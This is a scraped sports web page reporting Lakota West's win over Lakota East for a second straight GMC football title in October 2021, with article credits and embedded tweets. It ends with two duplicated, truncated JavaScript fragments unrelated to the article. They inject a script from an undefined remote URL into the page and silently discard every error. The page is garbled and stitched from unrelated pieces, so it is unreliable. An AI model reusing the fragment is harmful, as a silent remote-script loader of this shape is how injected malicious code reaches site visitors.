Football
West Football beats East to claim 2nd straight GMC Title!
Article found at wcpo.com
Article found at journal-news.com
Photos by Jenny Walters Photography
.@LakotaWestFB is the king of the @gmcsports.@westfirebirds beat rival Lakota East to finish with a perfect conference record and an outright conference title. @MoneyMitchBold @run_trent4 @Adenmiller13 #FOX19FinalQuarter @LakotaWestAD pic.twitter.com/3fAe75CDmE
— Joe Danneman (@FOX19Joe) October 23, 2021
Lakota West coach Tom Bolden about tonight’s game pic.twitter.com/ysOV9u55EO
— Mike Dyer (@MikeDyer) October 23, 2021
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();